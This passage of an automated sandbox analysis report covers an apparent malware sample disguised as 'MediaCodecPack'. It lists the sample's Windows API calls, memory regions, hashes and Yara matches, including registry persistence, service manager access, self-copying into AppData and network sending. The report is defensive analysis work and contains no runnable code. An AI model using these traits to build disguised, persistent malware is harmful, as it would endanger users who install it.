                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                • API String ID: 1586166983-3897538755
                                                                                • Opcode ID: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                • Instruction ID: 16557cb42895348a952eaf9991b4a66d97034997999308634aca6265cd08f949
                                                                                • Opcode Fuzzy Hash: 17134def4ae493ed892da5cf1e4e02e31044a7d05c58cb64cc9be4b1d3063305
                                                                                • Instruction Fuzzy Hash: E321BB326041618FC7219B69D985BE5BBB0EF0131076844BBE086F71E2D339D907DB8A
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D036A7
                                                                                  • Part of subcall function 02D02420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02432
                                                                                  • Part of subcall function 02D02420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D02445
                                                                                  • Part of subcall function 02D02420: RtlEnterCriticalSection.NTDLL(?), ref: 02D02454
                                                                                  • Part of subcall function 02D02420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02469
                                                                                  • Part of subcall function 02D02420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D02470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1601054111-0
                                                                                • Opcode ID: bb1c9867ba827f0adecab07e5faa5fc21d7abc513769f8b798b963526ac3f947
                                                                                • Instruction ID: 30602c8f405ed68d7a59eda1633845fd51ca8bbc83333f37ac705109bed48133
                                                                                • Opcode Fuzzy Hash: bb1c9867ba827f0adecab07e5faa5fc21d7abc513769f8b798b963526ac3f947
                                                                                • Instruction Fuzzy Hash: C411C1B5500208ABDB259E58DCC9FAA3BA9EF94354F104456FE56CA3E0C774EC60CB94
                                                                                APIs
                                                                                • __beginthreadex.LIBCMT ref: 02D11116
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D0998D,00000000), ref: 02D11147
                                                                                • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D0998D,00000000), ref: 02D11155
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleResumeThread__beginthreadex
                                                                                • String ID:
                                                                                • API String ID: 1685284544-0
                                                                                • Opcode ID: c2aac614e1591ba20cf912e59fb5c52f6890b3b78ab7d6bd2aed7a39aec389c0
                                                                                • Instruction ID: 8ab2938dda75d636413edbdf2e8c349eb31096de83066c1aaffdeb42b15c499c
                                                                                • Opcode Fuzzy Hash: c2aac614e1591ba20cf912e59fb5c52f6890b3b78ab7d6bd2aed7a39aec389c0
                                                                                • Instruction Fuzzy Hash: FAF0C870240210ABDB209E5CFC80F95B3E8EF58725F24055AF648C7780C361EC92CA90
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(02D3529C), ref: 02D01ABA
                                                                                • WSAStartup.WS2_32(00000002,00000000), ref: 02D01ACB
                                                                                • InterlockedExchange.KERNEL32(02D352A0,00000000), ref: 02D01AD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$ExchangeIncrementStartup
                                                                                • String ID:
                                                                                • API String ID: 1856147945-0
                                                                                • Opcode ID: 5c1afbbdbfdfad2cf9e22027e71f0b4ab1b45b21178000f2e5c725a1c99bef55
                                                                                • Instruction ID: 78d439b2c647938bc2564f32f0b676e00a91570661d8e3ff6de9302f4a23ff10
                                                                                • Opcode Fuzzy Hash: 5c1afbbdbfdfad2cf9e22027e71f0b4ab1b45b21178000f2e5c725a1c99bef55
                                                                                • Instruction Fuzzy Hash: BFD05E35D842046BE23166A0BE4FF78776CE70A712FD00651FD6AC43C0EA526D2885A7
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D38000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d38000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: InternetOpen
                                                                                • String ID: U[6
                                                                                • API String ID: 2038078732-2089642770
                                                                                • Opcode ID: 9e816ddb1375a7d65bd89c04597a215788237d8bfad8d8526305d01543d11537
                                                                                • Instruction ID: 5f9b06f398bf58ffc253383accdb0dd2d9354f4bb3eccd24edaebba85ed2b544
                                                                                • Opcode Fuzzy Hash: 9e816ddb1375a7d65bd89c04597a215788237d8bfad8d8526305d01543d11537
                                                                                • Instruction Fuzzy Hash: C4515DB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE6D583700D63558548A97
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID: \
                                                                                • API String ID: 1889721586-2967466578
                                                                                • Opcode ID: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                • Instruction ID: 8e8821c1328745804740ee922d0e0ad68cd22f4e5c91e5f54ebb7d82a2aacae8
                                                                                • Opcode Fuzzy Hash: 47e18badabb9a11a3572604af3e4cd9f8c383518db4218f6d02ffe5002e8c993
                                                                                • Instruction Fuzzy Hash: 1CF0B170808305DFD7545F909F595EE76649B00704F30187BD252B51D1C67D0D86EB1E
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID: \
                                                                                • API String ID: 1889721586-2967466578
                                                                                • Opcode ID: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                • Instruction ID: dfed284e86085894593c89054d3589a99278d46d110c027cd813ee3a9ff9004b
                                                                                • Opcode Fuzzy Hash: 17e45ab395ead0f62f396e7f1f242be3a45938007961b54f1ffbde5d339a0c73
                                                                                • Instruction Fuzzy Hash: 2EE08670404149FEDB244A985F5DBEA25E85700384F3404F79685B50D1C1780E49AA6B
                                                                                APIs
                                                                                • RegSetValueExA.KERNELBASE(?,media_codec_pack_i54,00000000,00000004), ref: 0040D0C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: media_codec_pack_i54
                                                                                • API String ID: 3702945584-2191737078
                                                                                • Opcode ID: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                • Instruction ID: 2460327dcc54fba3be2b988abc8dcdb9b1e9a0a8134423c7c4e4248cbea0685f
                                                                                • Opcode Fuzzy Hash: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                • Instruction Fuzzy Hash: 37C08C30A88200EFEA210B404F09FA43634A708705F3140E2B346340E082B90EA2AE0E
                                                                                APIs
                                                                                • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DD69
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: Common AppData
                                                                                • API String ID: 3660427363-2574214464
                                                                                • Opcode ID: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                • Instruction ID: 7de116b4efb22206a60a49d6e64df041c4b05bd6381c1080f431fe0b0fcf661a
                                                                                • Opcode Fuzzy Hash: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                • Instruction Fuzzy Hash: 39C04C70908105EADB114FA08E44E7E7678BE40740B21457B9053710D0D7789906B65B
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04BF2
                                                                                  • Part of subcall function 02D01BA7: __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                  • Part of subcall function 02D01BA7: RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                  • Part of subcall function 02D01BA7: RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                  • Part of subcall function 02D0D0FC: __EH_prolog.LIBCMT ref: 02D0D101
                                                                                  • Part of subcall function 02D0D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0D180
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 02D04CF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1927618982-0
                                                                                • Opcode ID: a8e6b5ae2c76a7d32a1f14ed6a901d9ac5d896576528961268b1a3b04af02c3a
                                                                                • Instruction ID: 7021f6c3eb4a1eb43fd46b95b9ad284137e192ec72dc021f2e504a534d109841
                                                                                • Opcode Fuzzy Hash: a8e6b5ae2c76a7d32a1f14ed6a901d9ac5d896576528961268b1a3b04af02c3a
                                                                                • Instruction Fuzzy Hash: 9E510671D042489FDB15DFA8C584BEEBBB5EF18314F14809AE905AB3A1DB709E44CF60
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02D47
                                                                                • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D02D5C
                                                                                  • Part of subcall function 02D0950D: WSAGetLastError.WS2_32(00000000,?,?,02D02A51), ref: 02D0951B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Send
                                                                                • String ID:
                                                                                • API String ID: 1282938840-0
                                                                                • Opcode ID: b5156d7c9c493a7855104402b339cbe8674530a071ff975aef5bdbcd6bf951da
                                                                                • Instruction ID: 4c568518658710e5b958ec1adc026b5caf3e9d4c8c8687b155b312018ebfdd35
                                                                                • Opcode Fuzzy Hash: b5156d7c9c493a7855104402b339cbe8674530a071ff975aef5bdbcd6bf951da
                                                                                • Instruction Fuzzy Hash: 540171B5901205AFD7306F9598D8A6BBBEDEB45764B20052EE89983390DB709D00CBB1
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D0740B
                                                                                • shutdown.WS2_32(?,00000002), ref: 02D07414
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastshutdown
                                                                                • String ID:
                                                                                • API String ID: 1920494066-0
                                                                                • Opcode ID: fd6cec96d2c1763e5e445a1068bbb1a8fade10d5d4f8b05b1e1ad815812ecf57
                                                                                • Instruction ID: 8c397b9ac738c76d49e3fed6d0cf0aa63e1071aaf139806f3fcdb2892795bbd7
                                                                                • Opcode Fuzzy Hash: fd6cec96d2c1763e5e445a1068bbb1a8fade10d5d4f8b05b1e1ad815812ecf57
                                                                                • Instruction Fuzzy Hash: CBF09035A043148FD720AF64D454B5EBBE5EF09324F518819E9A9973D0DB30BC10CFA1
                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                  • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                  • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocCreateDestroyVersion
                                                                                • String ID:
                                                                                • API String ID: 2507506473-0
                                                                                • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                APIs
                                                                                • lstrcmpiW.KERNELBASE(?), ref: 0040230F
                                                                                • lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                • API String ID: 1586166983-3897538755
                                                                                • Opcode ID: 3f0c9d6c28f36c4cda97f59a851c5945851b368a4b196ea0daf740ef6fd4933c
                                                                                • Instruction ID: 49038fb2ec3d825e67705f3a2b78a953a8be5b70ab98e67aaa9033b67ec783d8
                                                                                • Opcode Fuzzy Hash: 3f0c9d6c28f36c4cda97f59a851c5945851b368a4b196ea0daf740ef6fd4933c
                                                                                • Instruction Fuzzy Hash: 54E02B71D052458FC7248B20995AEF13BB0AF01300F2540FFD449A20E3CB3D4916EB5E
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0511E
                                                                                  • Part of subcall function 02D03D7E: htons.WS2_32(?), ref: 02D03DA2
                                                                                  • Part of subcall function 02D03D7E: htonl.WS2_32(00000000), ref: 02D03DB9
                                                                                  • Part of subcall function 02D03D7E: htonl.WS2_32(00000000), ref: 02D03DC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonl$H_prologhtons
                                                                                • String ID:
                                                                                • API String ID: 4039807196-0
                                                                                • Opcode ID: 57f44ed7d336e1637d2bf50d58b29bda34c521971ee404e22d77d30b8587c42b
                                                                                • Instruction ID: cf2311e871959f2e7847350a21c7f5e4c4244674281b82170aacf670e6d6ddf0
                                                                                • Opcode Fuzzy Hash: 57f44ed7d336e1637d2bf50d58b29bda34c521971ee404e22d77d30b8587c42b
                                                                                • Instruction Fuzzy Hash: FA813672D0424A8ECF05DFA8E190AEEBBB5EF48214F14819AD850B7390EB356E05CF75
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D9CA
                                                                                  • Part of subcall function 02D01A01: TlsGetValue.KERNEL32 ref: 02D01A0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologValue
                                                                                • String ID:
                                                                                • API String ID: 3700342317-0
                                                                                • Opcode ID: 304d9df10f10aca8c479f4303070fb2784896f8dac8e5ae19ee683e2e0c88a62
                                                                                • Instruction ID: 4ed2039b7039b67aeab60d16032b538ed7a9a743937e32ce325bc6c49cb595bc
                                                                                • Opcode Fuzzy Hash: 304d9df10f10aca8c479f4303070fb2784896f8dac8e5ae19ee683e2e0c88a62
                                                                                • Instruction Fuzzy Hash: 2C211DB1908209AFDB04DFA9D481BFEBBF9EF58314F10415AE914A7390D775AD01CBA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D55A
                                                                                  • Part of subcall function 02D026DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D02706
                                                                                  • Part of subcall function 02D026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D0272B
                                                                                  • Part of subcall function 02D026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D23173), ref: 02D02738
                                                                                  • Part of subcall function 02D026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D02778
                                                                                  • Part of subcall function 02D026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D027D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID:
                                                                                • API String ID: 4293676635-0
                                                                                • Opcode ID: 32b16d3cf6c69f3df2b32c0321c325907244e528a7a75c62c414530ff2a37daf
                                                                                • Instruction ID: 25faddd0de406012f34e3a0f1b330f9719974a1c063c90eaaf4c8c2c58abde19
                                                                                • Opcode Fuzzy Hash: 32b16d3cf6c69f3df2b32c0321c325907244e528a7a75c62c414530ff2a37daf
                                                                                • Instruction Fuzzy Hash: 6701D0B0900B188FC328CF0AC144A46FBF4EF98318B05C5AF98498B722E7B1DA44CF94
                                                                                APIs
                                                                                • RegCreateKeyExA.KERNELBASE ref: 00402067
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                • Instruction ID: dc96bbfccdb8053c3a700f92ee76c71f5d4f4b682c0e303dba9fd296f600d57d
                                                                                • Opcode Fuzzy Hash: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                • Instruction Fuzzy Hash: 6AF03A9452C1C58AC7528B746FA05E13FB0952730475810BAD1C5BB2A3D13C4C4BFB2E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                • Instruction ID: d9ce72db35be277be2e25491e2fe96756ac457275e591dcd62e6f552b6e7838d
                                                                                • Opcode Fuzzy Hash: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                • Instruction Fuzzy Hash: EFE04F545281C58FC7518B74AFA09E13FB082263507951065D1C5AF223C53C0C0AF71E
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D339
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D0D555: __EH_prolog.LIBCMT ref: 02D0D55A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_malloc
                                                                                • String ID:
                                                                                • API String ID: 4254904621-0
                                                                                • Opcode ID: 85d18d68f780aeae025d7b65d01008e7f1298860faa9cf20fd219e886ab90080
                                                                                • Instruction ID: 49f2155d213221e2ece56dc1fc06edf90d5234ddcf4789d3091705cba6b411fc
                                                                                • Opcode Fuzzy Hash: 85d18d68f780aeae025d7b65d01008e7f1298860faa9cf20fd219e886ab90080
                                                                                • Instruction Fuzzy Hash: 99E08671A041056BDB19EFA8E81572D7772DB44704F00456E7C09A2740EB319D10CA20
                                                                                APIs
                                                                                  • Part of subcall function 02D148CA: __getptd_noexit.LIBCMT ref: 02D148CB
                                                                                  • Part of subcall function 02D148CA: __amsg_exit.LIBCMT ref: 02D148D8
                                                                                  • Part of subcall function 02D124A3: __getptd_noexit.LIBCMT ref: 02D124A7
                                                                                  • Part of subcall function 02D124A3: __freeptd.LIBCMT ref: 02D124C1
                                                                                  • Part of subcall function 02D124A3: RtlExitUserThread.NTDLL(?,00000000,?,02D12483,00000000), ref: 02D124CA
                                                                                • __XcptFilter.LIBCMT ref: 02D1248F
                                                                                  • Part of subcall function 02D17954: __getptd_noexit.LIBCMT ref: 02D17958
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                • String ID:
                                                                                • API String ID: 1405322794-0
                                                                                • Opcode ID: bb7151c670bcdca12470227b0be95adc145e7aea6f19e0c84718119e4804f643
                                                                                • Instruction ID: 106830e8c1031586c8749758bd2bd720d677c08361de04f87e59cf78f4d19010
                                                                                • Opcode Fuzzy Hash: bb7151c670bcdca12470227b0be95adc145e7aea6f19e0c84718119e4804f643
                                                                                • Instruction Fuzzy Hash: 9BE0ECB1D00614AFFB09ABA0E949F6DB776EF44315F200189E1029B770DB759D44DE30
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                • Instruction ID: d713a23b53c9c0110701be63413fe7ba467f275e167bf38fafe440168cb698c8
                                                                                • Opcode Fuzzy Hash: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                • Instruction Fuzzy Hash: CBC01230A0C105D9D7408AB09A482F933A06B10344F2049379003B31E0D7BC96477A1F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                • Instruction ID: 3ae1305fe96f7b026bdce6d5508892710976a9331c56da0873e7a2e16a087c10
                                                                                • Opcode Fuzzy Hash: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                • Instruction Fuzzy Hash: 59C08C00058140D2D6621B80830C228BA60EC0132837105BB89C2B08E2C93E4002639F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                • Instruction ID: 7bbc41cb3671d7189b02c36164488bf25c771ca428d4fc6e3714b0364fd68ab0
                                                                                • Opcode Fuzzy Hash: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                • Instruction Fuzzy Hash: 85B09270904009ABC6148A508E44AB726B89704B41F5604BB944BF10D0DB3D8A4EE92A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
